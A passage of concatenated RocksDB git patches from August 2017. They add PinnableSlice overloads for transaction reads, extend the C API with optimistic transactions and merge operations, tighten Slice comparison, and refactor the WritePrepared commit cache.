@@ class Transaction { ColumnFamilyHandle* column_family, const Slice& key, std::string* value) = 0; + // An overload of the the above method that receives a PinnableSlice + // For backward compatiblity a default implementation is provided + virtual Status Get(const ReadOptions& options, + ColumnFamilyHandle* column_family, const Slice& key, + PinnableSlice* pinnable_val) { + assert(pinnable_val != nullptr); + auto s = Get(options, column_family, key, pinnable_val->GetSelf()); + pinnable_val->PinSelf(); + return s; + } + virtual Status Get(const ReadOptions& options, const Slice& key, std::string* value) = 0; + virtual Status Get(const ReadOptions& options, const Slice& key, + PinnableSlice* pinnable_val) { + assert(pinnable_val != nullptr); + auto s = Get(options, key, pinnable_val->GetSelf()); + pinnable_val->PinSelf(); + return s; + } virtual std::vector MultiGet( const ReadOptions& options, @@ -212,6 +230,22 @@ class Transaction { const Slice& key, std::string* value, bool exclusive = true) = 0; + // An overload of the the above method that receives a PinnableSlice + // For backward compatiblity a default implementation is provided + virtual Status GetForUpdate(const ReadOptions& options, + ColumnFamilyHandle* column_family, + const Slice& key, PinnableSlice* pinnable_val, + bool exclusive = true) { + if (pinnable_val == nullptr) { + std::string* null_str = nullptr; + return GetForUpdate(options, key, null_str); + } else { + auto s = GetForUpdate(options, key, pinnable_val->GetSelf()); + pinnable_val->PinSelf(); + return s; + } + } + virtual Status GetForUpdate(const ReadOptions& options, const Slice& key, std::string* value, bool exclusive = true) = 0; diff --git a/include/rocksdb/utilities/write_batch_with_index.h b/include/rocksdb/utilities/write_batch_with_index.h index 38809e1c781..24d8f30aa51 100644 --- a/include/rocksdb/utilities/write_batch_with_index.h +++ b/include/rocksdb/utilities/write_batch_with_index.h @@ -186,10 +186,20 @@ class WriteBatchWithIndex : public WriteBatchBase { // regardless). Status GetFromBatchAndDB(DB* db, const ReadOptions& read_options, const Slice& key, std::string* value); + + // An overload of the the above method that receives a PinnableSlice + Status GetFromBatchAndDB(DB* db, const ReadOptions& read_options, + const Slice& key, PinnableSlice* value); + Status GetFromBatchAndDB(DB* db, const ReadOptions& read_options, ColumnFamilyHandle* column_family, const Slice& key, std::string* value); + // An overload of the the above method that receives a PinnableSlice + Status GetFromBatchAndDB(DB* db, const ReadOptions& read_options, + ColumnFamilyHandle* column_family, const Slice& key, + PinnableSlice* value); + // Records the state of the batch for future calls to RollbackToSavePoint(). // May be called multiple times to set multiple save points. void SetSavePoint() override; diff --git a/utilities/transactions/transaction_base.cc b/utilities/transactions/transaction_base.cc index 0357c113f23..4612dfa5497 100644 --- a/utilities/transactions/transaction_base.cc +++ b/utilities/transactions/transaction_base.cc @@ -181,8 +181,21 @@ Status TransactionBaseImpl::RollbackToSavePoint() { Status TransactionBaseImpl::Get(const ReadOptions& read_options, ColumnFamilyHandle* column_family, const Slice& key, std::string* value) { + assert(value != nullptr); + PinnableSlice pinnable_val(value); + assert(!pinnable_val.IsPinned()); + auto s = Get(read_options, column_family, key, &pinnable_val); + if (s.ok() && pinnable_val.IsPinned()) { + value->assign(pinnable_val.data(), pinnable_val.size()); + } // else value is already assigned + return s; +} + +Status TransactionBaseImpl::Get(const ReadOptions& read_options, + ColumnFamilyHandle* column_family, + const Slice& key, PinnableSlice* pinnable_val) { return write_batch_.GetFromBatchAndDB(db_, read_options, column_family, key, - value); + pinnable_val); } Status TransactionBaseImpl::GetForUpdate(const ReadOptions& read_options, @@ -192,7 +205,26 @@ Status TransactionBaseImpl::GetForUpdate(const ReadOptions& read_options, Status s = TryLock(column_family, key, true /* read_only */, exclusive); if (s.ok() && value != nullptr) { - s = Get(read_options, column_family, key, value); + assert(value != nullptr); + PinnableSlice pinnable_val(value); + assert(!pinnable_val.IsPinned()); + s = Get(read_options, column_family, key, &pinnable_val); + if (s.ok() && pinnable_val.IsPinned()) { + value->assign(pinnable_val.data(), pinnable_val.size()); + } // else value is already assigned + } + return s; +} + +Status TransactionBaseImpl::GetForUpdate(const ReadOptions& read_options, + ColumnFamilyHandle* column_family, + const Slice& key, + PinnableSlice* pinnable_val, + bool exclusive) { + Status s = TryLock(column_family, key, true /* read_only */, exclusive); + + if (s.ok() && pinnable_val != nullptr) { + s = Get(read_options, column_family, key, pinnable_val); } return s; } diff --git a/utilities/transactions/transaction_base.h b/utilities/transactions/transaction_base.h index 1514836489e..c73b329f400 100644 --- a/utilities/transactions/transaction_base.h +++ b/utilities/transactions/transaction_base.h @@ -46,18 +46,27 @@ class TransactionBaseImpl : public Transaction { Status RollbackToSavePoint() override; + using Transaction::Get; Status Get(const ReadOptions& options, ColumnFamilyHandle* column_family, const Slice& key, std::string* value) override; + Status Get(const ReadOptions& options, ColumnFamilyHandle* column_family, + const Slice& key, PinnableSlice* value) override; + Status Get(const ReadOptions& options, const Slice& key, std::string* value) override { return Get(options, db_->DefaultColumnFamily(), key, value); } + using Transaction::GetForUpdate; Status GetForUpdate(const ReadOptions& options, ColumnFamilyHandle* column_family, const Slice& key, std::string* value, bool exclusive) override; + Status GetForUpdate(const ReadOptions& options, + ColumnFamilyHandle* column_family, const Slice& key, + PinnableSlice* pinnable_val, bool exclusive) override; + Status GetForUpdate(const ReadOptions& options, const Slice& key, std::string* value, bool exclusive) override { return GetForUpdate(options, db_->DefaultColumnFamily(), key, value, diff --git a/utilities/write_batch_with_index/write_batch_with_index.cc b/utilities/write_batch_with_index/write_batch_with_index.cc index dc5d0fcf60f..b2820109cc8 100644 --- a/utilities/write_batch_with_index/write_batch_with_index.cc +++ b/utilities/write_batch_with_index/write_batch_with_index.cc @@ -385,8 +385,8 @@ class WBWIIteratorImpl : public WBWIIterator { }; struct WriteBatchWithIndex::Rep { - Rep(const Comparator* index_comparator, size_t reserved_bytes = 0, - size_t max_bytes = 0, bool _overwrite_key = false) + explicit Rep(const Comparator* index_comparator, size_t reserved_bytes = 0, + size_t max_bytes = 0, bool _overwrite_key = false) : write_batch(reserved_bytes, max_bytes), comparator(index_comparator, &write_batch), skip_list(comparator, &arena), @@ -743,8 +743,23 @@ Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db, const ReadOptions& read_options, const Slice& key, std::string* value) { + assert(value != nullptr); + PinnableSlice pinnable_val(value); + assert(!pinnable_val.IsPinned()); + auto s = GetFromBatchAndDB(db, read_options, db->DefaultColumnFamily(), key, + &pinnable_val); + if (s.ok() && pinnable_val.IsPinned()) { + value->assign(pinnable_val.data(), pinnable_val.size()); + } // else value is already assigned + return s; +} + +Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db, + const ReadOptions& read_options, + const Slice& key, + PinnableSlice* pinnable_val) { return GetFromBatchAndDB(db, read_options, db->DefaultColumnFamily(), key, - value); + pinnable_val); } Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db, @@ -752,19 +767,38 @@ Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db, ColumnFamilyHandle* column_family, const Slice& key, std::string* value) { + assert(value != nullptr); + PinnableSlice pinnable_val(value); + assert(!pinnable_val.IsPinned()); + auto s = + GetFromBatchAndDB(db, read_options, column_family, key, &pinnable_val); + if (s.ok() && pinnable_val.IsPinned()) { + value->assign(pinnable_val.data(), pinnable_val.size()); + } // else value is already assigned + return s; +} + +Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db, + const ReadOptions& read_options, + ColumnFamilyHandle* column_family, + const Slice& key, + PinnableSlice* pinnable_val) { Status s; MergeContext merge_context; const ImmutableDBOptions& immuable_db_options = reinterpret_cast(db)->immutable_db_options(); - std::string batch_value; + // Since the lifetime of the WriteBatch is the same as that of the transaction + // we cannot pin it as otherwise the returned value will not be available + // after the transaction finishes. + std::string& batch_value = *pinnable_val->GetSelf(); WriteBatchWithIndexInternal::Result result = WriteBatchWithIndexInternal::GetFromBatch( immuable_db_options, this, column_family, key, &merge_context, &rep->comparator, &batch_value, rep->overwrite_key, &s); if (result == WriteBatchWithIndexInternal::Result::kFound) { - value->assign(batch_value.data(), batch_value.size()); + pinnable_val->PinSelf(); return s; } if (result == WriteBatchWithIndexInternal::Result::kDeleted) { @@ -785,7 +819,7 @@ Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db, result == WriteBatchWithIndexInternal::Result::kNotFound); // Did not find key in batch OR could not resolve Merges. Try DB. - s = db->Get(read_options, column_family, key, value); + s = db->Get(read_options, column_family, key, pinnable_val); if (s.ok() || s.IsNotFound()) { // DB Get Succeeded if (result == WriteBatchWithIndexInternal::Result::kMergeInProgress) { @@ -797,18 +831,18 @@ Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db, Env* env = immuable_db_options.env; Logger* logger = immuable_db_options.info_log.get(); - Slice db_slice(*value); Slice* merge_data; if (s.ok()) { - merge_data = &db_slice; + merge_data = pinnable_val; } else { // Key not present in db (s.IsNotFound()) merge_data = nullptr; } if (merge_operator) { - s = MergeHelper::TimedFullMerge(merge_operator, key, merge_data, - merge_context.GetOperands(), value, - logger, statistics, env); + s = MergeHelper::TimedFullMerge( + merge_operator, key, merge_data, merge_context.GetOperands(), + pinnable_val->GetSelf(), logger, statistics, env); + pinnable_val->PinSelf(); } else { s = Status::InvalidArgument("Options::merge_operator must be set"); } From 234f33a3f9154f2d81ef72bd0165e1bf064c2c5a Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Wed, 23 Aug 2017 10:45:17 -0700 Subject: [PATCH 142/205] allow nullptr Slice only as sentinel Summary: Allow `Slice` holding nullptr as a sentinel value but not in comparisons. This new restriction eliminates the need for the manual checks in 39ef900551a4d88c8546ca086baaba76730e6162, while still conforming to glibc's `memcmp` API. Thanks siying for the idea. Users may need to migrate, so mentioned it in HISTORY.md. Closes https://github.com/facebook/rocksdb/pull/2777 Differential Revision: D5686016 Pulled By: ajkr fbshipit-source-id: 03a2ca3fd9a0ebade9d0d5686c81d59a9534f563 --- HISTORY.md | 1 + include/rocksdb/slice.h | 10 +--------- table/cuckoo_table_builder_test.cc | 6 +++++- utilities/merge_operators/max.cc | 2 ++ 4 files changed, 9 insertions(+), 10 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index a40a3b8926b..a63d9d62861 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -2,6 +2,7 @@ ## Unreleased ### Public API Change * Users of `Statistics::getHistogramString()` will see fewer histogram buckets and different bucket endpoints. +* `Slice::compare` and BytewiseComparator `Compare` no longer accept `Slice`s containing nullptr. ### New Features * Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators. diff --git a/include/rocksdb/slice.h b/include/rocksdb/slice.h index ec33c97e632..1630803b9fd 100644 --- a/include/rocksdb/slice.h +++ b/include/rocksdb/slice.h @@ -214,16 +214,8 @@ inline bool operator!=(const Slice& x, const Slice& y) { } inline int Slice::compare(const Slice& b) const { - const size_t min_len = (size_ < b.size_) ? size_ : b.size_; - if (min_len == 0) { - if (size_ > 0) { - return 1; - } else if (b.size_ > 0) { - return -1; - } - return 0; - } assert(data_ != nullptr && b.data_ != nullptr); + const size_t min_len = (size_ < b.size_) ? size_ : b.size_; int r = memcmp(data_, b.data_, min_len); if (r == 0) { if (size_ < b.size_) r = -1; diff --git a/table/cuckoo_table_builder_test.cc b/table/cuckoo_table_builder_test.cc index ec282b4b540..93daaca472b 100644 --- a/table/cuckoo_table_builder_test.cc +++ b/table/cuckoo_table_builder_test.cc @@ -109,7 +109,11 @@ class CuckooBuilderTest : public testing::Test { expected_locations.begin(); if (key_idx == keys.size()) { // i is not one of the expected locations. Empty bucket. - ASSERT_EQ(read_slice.compare(expected_unused_bucket), 0); + if (read_slice.data() == nullptr) { + ASSERT_EQ(0, expected_unused_bucket.size()); + } else { + ASSERT_EQ(read_slice.compare(expected_unused_bucket), 0); + } } else { keys_found[key_idx] = true; ASSERT_EQ(read_slice.compare(keys[key_idx] + values[key_idx]), 0); diff --git a/utilities/merge_operators/max.cc b/utilities/merge_operators/max.cc index 06e233fe89d..5f42e816ef7 100644 --- a/utilities/merge_operators/max.cc +++ b/utilities/merge_operators/max.cc @@ -25,6 +25,8 @@ class MaxOperator : public MergeOperator { if (merge_in.existing_value) { max = Slice(merge_in.existing_value->data(), merge_in.existing_value->size()); + } else if (max.data() == nullptr) { + max = Slice(); } for (const auto& op : merge_in.operand_list) { From 90177432e4029b5d5350e66f7b4ff1a9ca5cf47e Mon Sep 17 00:00:00 2001 From: Andres Suarez Date: Wed, 23 Aug 2017 12:02:06 -0700 Subject: [PATCH 143/205] Remove leftover references to phutil_module_cache Reviewed By: mzlee Differential Revision: D5688624 fbshipit-source-id: c726b4e56bd823b994a7b713488fef93c6f796d0 --- .gitignore | 1 - 1 file changed, 1 deletion(-) diff --git a/.gitignore b/.gitignore index 87d5b98a453..03b805983ad 100644 --- a/.gitignore +++ b/.gitignore @@ -39,7 +39,6 @@ coverage/COVERAGE_REPORT .gdbhistory .gdb_history package/ -.phutil_module_cache unity.a tags etags From c10b3913149d432fc4c0a5e82d3413f2a06da53f Mon Sep 17 00:00:00 2001 From: BH1XUW Date: Wed, 23 Aug 2017 12:10:37 -0700 Subject: [PATCH 144/205] LANGUAGE-BINDINGS.md: add another rust binding MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Summary: I made another rust binding. 👻 * Use C++ API (instead of C API) * Try to follow [Rust Guidelines](https://aturon.github.io/README.html) * Working in progress (the APIs are not stable yet) Closes https://github.com/facebook/rocksdb/pull/2438 Differential Revision: D5690612 Pulled By: siying fbshipit-source-id: 11d3956c33b5e5366555afbf3786b782be3046e7 --- LANGUAGE-BINDINGS.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/LANGUAGE-BINDINGS.md b/LANGUAGE-BINDINGS.md index d28035bf816..8084b6c3019 100644 --- a/LANGUAGE-BINDINGS.md +++ b/LANGUAGE-BINDINGS.md @@ -9,5 +9,7 @@ This is the list of all known third-party language bindings for RocksDB. If some * Haskell - https://hackage.haskell.org/package/rocksdb-haskell * PHP - https://github.com/Photonios/rocksdb-php * C# - https://github.com/warrenfalk/rocksdb-sharp -* Rust - https://github.com/spacejam/rust-rocksdb +* Rust + * https://github.com/spacejam/rust-rocksdb + * https://github.com/bh1xuw/rust-rocks * D programming language - https://github.com/b1naryth1ef/rocksdb From a12479819d19997e386597711b316b00c1402582 Mon Sep 17 00:00:00 2001 From: mkosieradzki Date: Wed, 23 Aug 2017 12:32:42 -0700 Subject: [PATCH 145/205] Improved transactions support in C API Summary: Solves #2632 Added OptimisticTransactionDB to the C API. Added missing merge operations to Transaction. Added missing get_for_update operation to transaction If required I will create tests for this another day. Closes https://github.com/facebook/rocksdb/pull/2633 Differential Revision: D5600906 Pulled By: yiwu-arbug fbshipit-source-id: da23e4484433d8f59d471f778ff2ae210e3fe4eb --- db/c.cc | 123 ++++++++++++++++++++++++++++++++++++++++++-- include/rocksdb/c.h | 48 +++++++++++++++++ 2 files changed, 166 insertions(+), 5 deletions(-) diff --git a/db/c.cc b/db/c.cc index 788eab68afb..cbfb8557d0d 100644 --- a/db/c.cc +++ b/db/c.cc @@ -36,6 +36,7 @@ #include "utilities/merge_operators.h" #include "rocksdb/utilities/transaction.h" #include "rocksdb/utilities/transaction_db.h" +#include "rocksdb/utilities/optimistic_transaction_db.h" #include "rocksdb/utilities/checkpoint.h" using rocksdb::BytewiseComparator; @@ -95,6 +96,8 @@ using rocksdb::PinnableSlice; using rocksdb::TransactionDBOptions; using rocksdb::TransactionDB; using rocksdb::TransactionOptions; +using rocksdb::OptimisticTransactionDB; +using rocksdb::OptimisticTransactionOptions; using rocksdb::Transaction; using rocksdb::Checkpoint; @@ -153,6 +156,12 @@ struct rocksdb_transaction_t { struct rocksdb_checkpoint_t { Checkpoint* rep; }; +struct rocksdb_optimistictransactiondb_t { + OptimisticTransactionDB* rep; +}; +struct rocksdb_optimistictransaction_options_t { + OptimisticTransactionOptions rep; +}; struct rocksdb_compactionfiltercontext_t { CompactionFilter::Context rep; @@ -3253,6 +3262,21 @@ void rocksdb_transaction_options_set_max_write_batch_size( opt->rep.max_write_batch_size = size; } +rocksdb_optimistictransaction_options_t* +rocksdb_optimistictransaction_options_create() { + return new rocksdb_optimistictransaction_options_t; +} + +void rocksdb_optimistictransaction_options_destroy( + rocksdb_optimistictransaction_options_t* opt) { + delete opt; +} + +void rocksdb_optimistictransaction_options_set_set_snapshot( + rocksdb_optimistictransaction_options_t* opt, unsigned char v) { + opt->rep.set_snapshot = v; +} + rocksdb_column_family_handle_t* rocksdb_transactiondb_create_column_family( rocksdb_transactiondb_t* txn_db, const rocksdb_options_t* column_family_options, @@ -3320,7 +3344,14 @@ void rocksdb_transaction_destroy(rocksdb_transaction_t* txn) { delete txn; } -//Read a key inside a transaction +const rocksdb_snapshot_t* rocksdb_transaction_get_snapshot( + rocksdb_transaction_t* txn) { + rocksdb_snapshot_t* result = new rocksdb_snapshot_t; + result->rep = txn->rep->GetSnapshot(); + return result; +} + +// Read a key inside a transaction char* rocksdb_transaction_get(rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options, const char* key, size_t klen, size_t* vlen, @@ -3361,6 +3392,28 @@ char* rocksdb_transaction_get_cf(rocksdb_transaction_t* txn, return result; } +// Read a key inside a transaction +char* rocksdb_transaction_get_for_update(rocksdb_transaction_t* txn, + const rocksdb_readoptions_t* options, + const char* key, size_t klen, + size_t* vlen, unsigned char exclusive, + char** errptr) { + char* result = nullptr; + std::string tmp; + Status s = + txn->rep->GetForUpdate(options->rep, Slice(key, klen), &tmp, exclusive); + if (s.ok()) { + *vlen = tmp.size(); + result = CopyString(tmp); + } else { + *vlen = 0; + if (!s.IsNotFound()) { + SaveError(errptr, s); + } + } + return result; +} + // Read a key outside a transaction char* rocksdb_transactiondb_get( rocksdb_transactiondb_t* txn_db, @@ -3418,13 +3471,13 @@ void rocksdb_transaction_put_cf(rocksdb_transaction_t* txn, Slice(val, vlen))); } -//Put a key outside a transaction +// Put a key outside a transaction void rocksdb_transactiondb_put(rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, const char* key, size_t klen, const char* val, size_t vlen, char** errptr) { - SaveError(errptr, - txn_db->rep->Put(options->rep, Slice(key, klen), Slice(val, vlen))); + SaveError(errptr, txn_db->rep->Put(options->rep, Slice(key, klen), + Slice(val, vlen))); } void rocksdb_transactiondb_put_cf(rocksdb_transactiondb_t* txn_db, @@ -3437,7 +3490,7 @@ void rocksdb_transactiondb_put_cf(rocksdb_transactiondb_t* txn_db, Slice(key, keylen), Slice(val, vallen))); } -//Write batch into transaction db +// Write batch into transaction db void rocksdb_transactiondb_write( rocksdb_transactiondb_t* db, const rocksdb_writeoptions_t* options, @@ -3446,6 +3499,22 @@ void rocksdb_transactiondb_write( SaveError(errptr, db->rep->Write(options->rep, &batch->rep)); } +// Merge a key inside a transaction +void rocksdb_transaction_merge(rocksdb_transaction_t* txn, const char* key, + size_t klen, const char* val, size_t vlen, + char** errptr) { + SaveError(errptr, txn->rep->Merge(Slice(key, klen), Slice(val, vlen))); +} + +// Merge a key outside a transaction +void rocksdb_transactiondb_merge(rocksdb_transactiondb_t* txn_db, + const rocksdb_writeoptions_t* options, + const char* key, size_t klen, const char* val, + size_t vlen, char** errptr) { + SaveError(errptr, + txn_db->rep->Merge(options->rep, Slice(key, klen), Slice(val, vlen))); +} + // Delete a key inside a transaction void rocksdb_transaction_delete(rocksdb_transaction_t* txn, const char* key, size_t klen, char** errptr) { @@ -3481,6 +3550,14 @@ rocksdb_iterator_t* rocksdb_transaction_create_iterator( return result; } +// Create an iterator outside a transaction +rocksdb_iterator_t* rocksdb_transactiondb_create_iterator( + rocksdb_transactiondb_t* txn_db, const rocksdb_readoptions_t* options) { + rocksdb_iterator_t* result = new rocksdb_iterator_t; + result->rep = txn_db->rep->NewIterator(options->rep); + return result; +} + void rocksdb_transactiondb_close(rocksdb_transactiondb_t* txn_db) { delete txn_db->rep; delete txn_db; @@ -3497,6 +3574,42 @@ rocksdb_checkpoint_t* rocksdb_transactiondb_checkpoint_object_create( return result; } +rocksdb_optimistictransactiondb_t* rocksdb_optimistictransactiondb_open( + const rocksdb_options_t* options, const char* name, + char** errptr) { + OptimisticTransactionDB* otxn_db; + if (SaveError(errptr, OptimisticTransactionDB::Open( + options->rep, std::string(name), &otxn_db))) { + return nullptr; + } + rocksdb_optimistictransactiondb_t* result = + new rocksdb_optimistictransactiondb_t; + result->rep = otxn_db; + return result; +} + +rocksdb_transaction_t* rocksdb_optimistictransaction_begin( + rocksdb_optimistictransactiondb_t* otxn_db, + const rocksdb_writeoptions_t* write_options, + const rocksdb_optimistictransaction_options_t* otxn_options, + rocksdb_transaction_t* old_txn) { + if (old_txn == nullptr) { + rocksdb_transaction_t* result = new rocksdb_transaction_t; + result->rep = otxn_db->rep->BeginTransaction(write_options->rep, + otxn_options->rep, nullptr); + return result; + } + old_txn->rep = otxn_db->rep->BeginTransaction( + write_options->rep, otxn_options->rep, old_txn->rep); + return old_txn; +} + +void rocksdb_optimistictransactiondb_close( + rocksdb_optimistictransactiondb_t* otxn_db) { + delete otxn_db->rep; + delete otxn_db; +} + void rocksdb_free(void* ptr) { free(ptr); } rocksdb_pinnableslice_t* rocksdb_get_pinned( diff --git a/include/rocksdb/c.h b/include/rocksdb/c.h index 838d7b0c951..2269f7261ca 100644 --- a/include/rocksdb/c.h +++ b/include/rocksdb/c.h @@ -117,6 +117,8 @@ typedef struct rocksdb_pinnableslice_t rocksdb_pinnableslice_t; typedef struct rocksdb_transactiondb_options_t rocksdb_transactiondb_options_t; typedef struct rocksdb_transactiondb_t rocksdb_transactiondb_t; typedef struct rocksdb_transaction_options_t rocksdb_transaction_options_t; +typedef struct rocksdb_optimistictransactiondb_t rocksdb_optimistictransactiondb_t; +typedef struct rocksdb_optimistictransaction_options_t rocksdb_optimistictransaction_options_t; typedef struct rocksdb_transaction_t rocksdb_transaction_t; typedef struct rocksdb_checkpoint_t rocksdb_checkpoint_t; @@ -1290,6 +1292,10 @@ extern ROCKSDB_LIBRARY_API void rocksdb_transaction_rollback( extern ROCKSDB_LIBRARY_API void rocksdb_transaction_destroy( rocksdb_transaction_t* txn); +// This snapshot should be freed using rocksdb_free +extern ROCKSDB_LIBRARY_API const rocksdb_snapshot_t* +rocksdb_transaction_get_snapshot(rocksdb_transaction_t* txn); + extern ROCKSDB_LIBRARY_API char* rocksdb_transaction_get( rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options, const char* key, size_t klen, size_t* vlen, char** errptr); @@ -1299,6 +1305,11 @@ extern ROCKSDB_LIBRARY_API char* rocksdb_transaction_get_cf( rocksdb_column_family_handle_t* column_family, const char* key, size_t klen, size_t* vlen, char** errptr); +extern ROCKSDB_LIBRARY_API char* rocksdb_transaction_get_for_update( + rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options, + const char* key, size_t klen, size_t* vlen, unsigned char exclusive, + char** errptr); + extern ROCKSDB_LIBRARY_API char* rocksdb_transactiondb_get( rocksdb_transactiondb_t* txn_db, const rocksdb_readoptions_t* options, const char* key, size_t klen, size_t* vlen, char** errptr); @@ -1329,6 +1340,14 @@ extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_write( rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, rocksdb_writebatch_t *batch, char** errptr); +extern ROCKSDB_LIBRARY_API void rocksdb_transaction_merge( + rocksdb_transaction_t* txn, const char* key, size_t klen, const char* val, + size_t vlen, char** errptr); + +extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_merge( + rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, + const char* key, size_t klen, const char* val, size_t vlen, char** errptr); + extern ROCKSDB_LIBRARY_API void rocksdb_transaction_delete( rocksdb_transaction_t* txn, const char* key, size_t klen, char** errptr); @@ -1349,6 +1368,10 @@ extern ROCKSDB_LIBRARY_API rocksdb_iterator_t* rocksdb_transaction_create_iterator(rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options); +extern ROCKSDB_LIBRARY_API rocksdb_iterator_t* +rocksdb_transactiondb_create_iterator(rocksdb_transactiondb_t* txn_db, + const rocksdb_readoptions_t* options); + extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_close( rocksdb_transactiondb_t* txn_db); @@ -1356,6 +1379,20 @@ extern ROCKSDB_LIBRARY_API rocksdb_checkpoint_t* rocksdb_transactiondb_checkpoint_object_create(rocksdb_transactiondb_t* txn_db, char** errptr); +extern ROCKSDB_LIBRARY_API rocksdb_optimistictransactiondb_t* +rocksdb_optimistictransactiondb_open(const rocksdb_options_t* options, + const char* name, char** errptr); + +extern ROCKSDB_LIBRARY_API rocksdb_transaction_t* +rocksdb_optimistictransaction_begin( + rocksdb_optimistictransactiondb_t* otxn_db, + const rocksdb_writeoptions_t* write_options, + const rocksdb_optimistictransaction_options_t* otxn_options, + rocksdb_transaction_t* old_txn); + +extern ROCKSDB_LIBRARY_API void rocksdb_optimistictransactiondb_close( + rocksdb_optimistictransactiondb_t* otxn_db); + /* Transaction Options */ extern ROCKSDB_LIBRARY_API rocksdb_transactiondb_options_t* @@ -1404,6 +1441,17 @@ extern ROCKSDB_LIBRARY_API void rocksdb_transaction_options_set_max_write_batch_size( rocksdb_transaction_options_t* opt, size_t size); + +extern ROCKSDB_LIBRARY_API rocksdb_optimistictransaction_options_t* +rocksdb_optimistictransaction_options_create(); + +extern ROCKSDB_LIBRARY_API void rocksdb_optimistictransaction_options_destroy( + rocksdb_optimistictransaction_options_t* opt); + +extern ROCKSDB_LIBRARY_API void +rocksdb_optimistictransaction_options_set_set_snapshot( + rocksdb_optimistictransaction_options_t* opt, unsigned char v); + // referring to convention (3), this should be used by client // to free memory that was malloc()ed extern ROCKSDB_LIBRARY_API void rocksdb_free(void* ptr); From cd26af34767a3e4319cda407ae021d38d48c6ac1 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Wed, 23 Aug 2017 13:49:29 -0700 Subject: [PATCH 146/205] Add unit test for WritePrepared skeleton Summary: Closes https://github.com/facebook/rocksdb/pull/2756 Differential Revision: D5660516 Pulled By: maysamyabandeh fbshipit-source-id: f3f3d3b5f544007a7fbdd78e49e4738b4437c7ee --- .../pessimistic_transaction_db.cc | 8 +- .../transactions/pessimistic_transaction_db.h | 27 +++- utilities/transactions/transaction_test.cc | 148 ++++++++++++++++-- 3 files changed, 164 insertions(+), 19 deletions(-) diff --git a/utilities/transactions/pessimistic_transaction_db.cc b/utilities/transactions/pessimistic_transaction_db.cc index 5304340543a..07c3eeeeb04 100644 --- a/utilities/transactions/pessimistic_transaction_db.cc +++ b/utilities/transactions/pessimistic_transaction_db.cc @@ -607,6 +607,7 @@ void WritePreparedTxnDB::AddCommitted(uint64_t prepare_seq, delayed_prepared_empty_.store(false, std::memory_order_release); } } + // With each change to max_evicted_seq_ fetch the live snapshots behind it { WriteLock wl(&snapshots_mutex_); InstrumentedMutex(db_impl_->mutex()); @@ -622,9 +623,7 @@ void WritePreparedTxnDB::AddCommitted(uint64_t prepare_seq, // be kept around because it overlaps with a live snapshot. { ReadLock rl(&snapshots_mutex_); - for (auto snapshot : snapshots_) { - auto snapshot_seq = - reinterpret_cast(snapshot)->number_; + for (auto snapshot_seq : snapshots_) { if (evicted.commit_seq <= snapshot_seq) { break; } @@ -691,5 +690,8 @@ bool WritePreparedTxnDB::ExchangeCommitEntry(uint64_t indexed_seq, return true; } +// 10m entry, 80MB size +uint64_t WritePreparedTxnDB::DEF_COMMIT_CACHE_SIZE = + static_cast(1 << 21); } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/utilities/transactions/pessimistic_transaction_db.h b/utilities/transactions/pessimistic_transaction_db.h index 4d1a5f4b511..489da30bfcb 100644 --- a/utilities/transactions/pessimistic_transaction_db.h +++ b/utilities/transactions/pessimistic_transaction_db.h @@ -161,11 +161,17 @@ class WritePreparedTxnDB : public PessimisticTransactionDB { public: explicit WritePreparedTxnDB(DB* db, const TransactionDBOptions& txn_db_options) - : PessimisticTransactionDB(db, txn_db_options) {} + : PessimisticTransactionDB(db, txn_db_options), + COMMIT_CACHE_SIZE(DEF_COMMIT_CACHE_SIZE) { + init(txn_db_options); + } explicit WritePreparedTxnDB(StackableDB* db, const TransactionDBOptions& txn_db_options) - : PessimisticTransactionDB(db, txn_db_options) {} + : PessimisticTransactionDB(db, txn_db_options), + COMMIT_CACHE_SIZE(DEF_COMMIT_CACHE_SIZE) { + init(txn_db_options); + } virtual ~WritePreparedTxnDB() {} @@ -183,6 +189,13 @@ class WritePreparedTxnDB : public PessimisticTransactionDB { void AddCommitted(uint64_t prepare_seq, uint64_t commit_seq); private: + friend class WritePreparedTransactionTest_IsInSnapshotTest_Test; + + void init(const TransactionDBOptions& /* unused */) { + commit_cache_ = + unique_ptr(new CommitEntry[COMMIT_CACHE_SIZE]{}); + } + // A heap with the amortized O(1) complexity for erase. It uses one extra heap // to keep track of erased entries that are not yet on top of the main heap. class PreparedHeap { @@ -236,11 +249,11 @@ class WritePreparedTxnDB : public PessimisticTransactionDB { // A heap of prepared transactions. Thread-safety is provided with // prepared_mutex_. PreparedHeap prepared_txns_; - // 10m entry, 80MB size - static const uint64_t COMMIT_CACHE_SIZE = static_cast(1 << 21); - // commit_cache_ is initialized to zero to tell apart an empty index from a - // filled one. Thread-safety is provided with commit_cache_mutex_. - CommitEntry commit_cache_[COMMIT_CACHE_SIZE] = {}; + static uint64_t DEF_COMMIT_CACHE_SIZE; + const uint64_t COMMIT_CACHE_SIZE; + // commit_cache_ must be initialized to zero to tell apart an empty index from + // a filled one. Thread-safety is provided with commit_cache_mutex_. + unique_ptr commit_cache_; // The largest evicted *commit* sequence number from the commit_cache_ std::atomic max_evicted_seq_ = {}; // A map of the evicted entries from commit_cache_ that has to be kept around diff --git a/utilities/transactions/transaction_test.cc 